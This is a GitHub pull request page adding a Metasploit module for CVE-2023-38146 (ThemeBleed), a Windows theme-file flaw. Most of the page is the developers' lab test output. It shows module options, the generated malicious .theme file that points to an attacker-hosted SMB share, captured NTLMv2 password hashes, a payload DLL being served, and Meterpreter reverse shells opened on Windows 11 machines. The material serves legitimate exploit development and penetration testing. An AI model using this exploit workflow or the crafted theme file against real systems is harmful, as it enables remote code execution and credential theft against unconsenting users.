Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Working Module for CVE-2023-38146 #18404

Merged
merged 15 commits into from
Jan 4, 2024
Merged

Working Module for CVE-2023-38146 #18404

merged 15 commits into from
Jan 4, 2024

Conversation

bwatters-r7
Copy link
Contributor

This is a work in progress and is not currently working.
This adds a module targeting the fileformat vulnerability cve-2023-38146

closes #18367

@bwatters-r7 bwatters-r7 changed the title Non-Working Draft Module Non-Working Draft Module for CVE-2023-38146 Sep 27, 2023
@jvoisin
Copy link
Contributor

jvoisin commented Sep 29, 2023

CC @gabe-k :)

@bwatters-r7
Copy link
Contributor Author 

msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > show options

Module options (exploit/windows/fileformat/theme_dll_highjack_cve_2023_38146):

   Name             Current Setting                      Required  Description
   ----             ---------------                      --------  -----------
   FILENAME         cve.theme                            no        The file name.
   FILE_NAME                                             no        File name to share (Default Random)
   FOLDER_NAME                                           no        Folder name to share (Default none)
   MS_PAYLOAD_DLL   /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_3
   MS_SIGNED_DLL    /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_2
   MS_VERSION_FILE  /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_1
   SHARE            test                                 no        Share (Default Random)
   SRVHOST          10.5.135.201                         yes       The local host or network interface to listen on. This must be a
                                                                   n address on the local machine or 0.0.0.0 to listen on all addre
                                                                   sses.
   SRVPORT          4445                                 yes       The local port to listen on.
   STYLES_FILENAME  Aero                                 no        Styles filename


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Server is running. Listening on 10.5.135.201:4445
[*] Server started.
[*] primer
msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > [*] unc = \\10.5.135.201\test\Aero.msstyles_vrf.dll
[*] Shares: {"IPC$"=>#<RubySMB::Server::Share::Provider::IpcPipe:0x000055eb4afed180 @name="IPC$">, "test"=>#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 @vfs={"/"=>#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualPathname:0x000055eb4b04f8a8 @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/", @stat=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualStat:0x000055eb4b04e340 @values={}, @birthtime=2023-10-02 13:45:05.643575405 -0500>>, "/PbxUOu"=>#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualDynamicFile:0x000055eb4b047a40 @content_generator=#<Proc:0x000055eb4b0478b0 /home/tmoose/rapid7/metasploit-framework/lib/msf/core/exploit/remote/smb/server/share.rb:63>, @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/PbxUOu", @stat=nil>}, @path=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualPathname:0x000055eb4b04f8a8 @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/", @stat=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualStat:0x000055eb4b04e340 @values={}, @birthtime=2023-10-02 13:45:05.643575405 -0500>>, @name="test">}
[*] Shares test
[*] make_theme
[*] 1
[*] 2
[*] 3
[*] 4
[*] ; windows 11 theme exploit
; copyright 2023 fukin software foundation

[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\10.5.135.201\test\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS

[+] cve.theme stored at /home/tmoose/.msf4/local/cve.theme
[*] Received SMB connection from 10.5.132.136
[SMB] NTLMv2-SSP Client     : 10.5.132.136
[SMB] NTLMv2-SSP Username   : .\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::.:d0314225e4f7ebd0:bc6c32071c01e2ffa0d699d428a06acc:01010000000000000015e1c860f5d90153a38c9ec41931bb000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000015e1c860f5d901060004000200000008003000300000000000000001000000002000007e98f8304311f58dc097c4d0645d3fc43f83d17da8cbc45d95b61856a8e44b740a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000

[*] file_contents
[*] Serving 9119ab91e6c01a3018c9f602e8b73237
[*] file_contents
[*] Serving 4ce1420ace4e4266f94e96066b344d41

@smcintyre-r7 smcintyre-r7 self-assigned this Nov 1, 2023
@bwatters-r7 bwatters-r7 force-pushed the exploit/cve-2023-38146 branch from a57b227 to 95eb4cc Compare December 12, 2023 16:09
@bwatters-r7 bwatters-r7 changed the title Non-Working Draft Module for CVE-2023-38146 Working Draft Module for CVE-2023-38146 Dec 21, 2023
@bwatters-r7 bwatters-r7 added rn-modules release notes for new or majorly enhanced modules docs labels Dec 21, 2023
@bwatters-r7 bwatters-r7 marked this pull request as ready for review December 21, 2023 00:45
@bwatters-r7
Copy link
Contributor Author

After some serious help from Christophe and Spencer, this is finally ready for review. As a future thing, adding the ability to package the theme as a themepack file (AKA a cab file) would be nice, but this needs to get landed and it is easy enough to run lcab before uploading the file.

@bwatters-r7
Copy link
Contributor Author

Windows 11 build 2200

I used the aero.msstyles file from my Windows 10 host.

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole
Metasploit tip: Display the Framework log using the log command, learn 
more with help log
                                                  

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v6.3.47-dev-7fafab9680               ]
+ -- --=[ 2380 exploits - 1234 auxiliary - 417 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options

Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SHARE                             no        Share (Default Random)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
                                               al machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          445              yes       The local port to listen on.
   STYLE_FILE                        yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
   STYLE_FILE_NAME                   yes       The name of the style file to reference.
   THEME_FILE_NAME  exploit.theme    yes       The name of the theme file to generate.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201
SRVHOST => 10.5.135.201
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles' 
STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero
STYLE_FILE_NAME => aero
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true
verbose => true
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Server is running. Listening on 10.5.135.201:445
[*] Server started.
[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme
[*] Received SMB connection from 10.5.132.136
[SMB] NTLMv2-SSP Client     : 10.5.132.136
[SMB] NTLMv2-SSP Username   : .\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000

[*] Sending file to 10.5.132.136
[*] Sending stage (200774 bytes) to 10.5.132.136
[*] Server stopped.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-7M0LC28
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-7M0LC28\msfuser

@bwatters-r7 bwatters-r7 changed the title Working Draft Module for CVE-2023-38146 Working Module for CVE-2023-38146 Dec 21, 2023
smcintyre-r7
smcintyre-r7 approved these changes Jan 4, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I just successfully retested the latest changes and everything is looking good.

Testing Output 
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options 

Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):

   Name             Current Setting                                             Required  Description
   ----             ---------------                                             --------  -----------
   SHARE                                                                        no        Share (Default Random)
   SRVHOST          192.168.159.128                                             yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          445                                                         yes       The local port to listen on.
   STYLE_FILE       /home/smcintyre/Repositories/themebleed/data/aero.msstyles  yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
   STYLE_FILE_NAME  Aero                                                        yes       The name of the style file to reference.
   THEME_FILE_NAME  exploit.theme                                               yes       The name of the theme file to generate.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > [*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Server is running. Listening on 192.168.159.128:445
[*] Server started.
[+] exploit.theme stored at /home/smcintyre/.msf4/local/exploit.theme

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > cat /home/smcintyre/.msf4/local/exploit.theme
[*] exec: cat /home/smcintyre/.msf4/local/exploit.theme

[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\192.168.159.128\RDCXWb\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > 
[*] Received SMB connection from 192.168.159.70
[*] Skipping previously captured hash for .\smcintyre
[*] Sending file to 192.168.159.70
[*] Sending stage (200774 bytes) to 192.168.159.70
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.70:49974) at 2024-01-04 11:19:26 -0500

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: windows-11-vm\smcintyre
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit 2028fbd into rapid7:master Jan 4, 2024
33 of 34 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for CVE-2023-38146 AKA ThemeBleed which is a TOCTOU issue in the way Windows handles theme files. The vulnerability can be leveraged to load a payload DLL from Metasploit to execute code within the context of the user who loads it. A legitimate signed theme DLL must be provided in order to use the exploit.

@bwatters-r7 bwatters-r7 deleted the exploit/cve-2023-38146 branch January 9, 2024 13:38
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Windows 11 theme file rce (CVE-2023-38146)
4 participants
@bwatters-r7 @jvoisin @smcintyre-r7 @zeroSteiner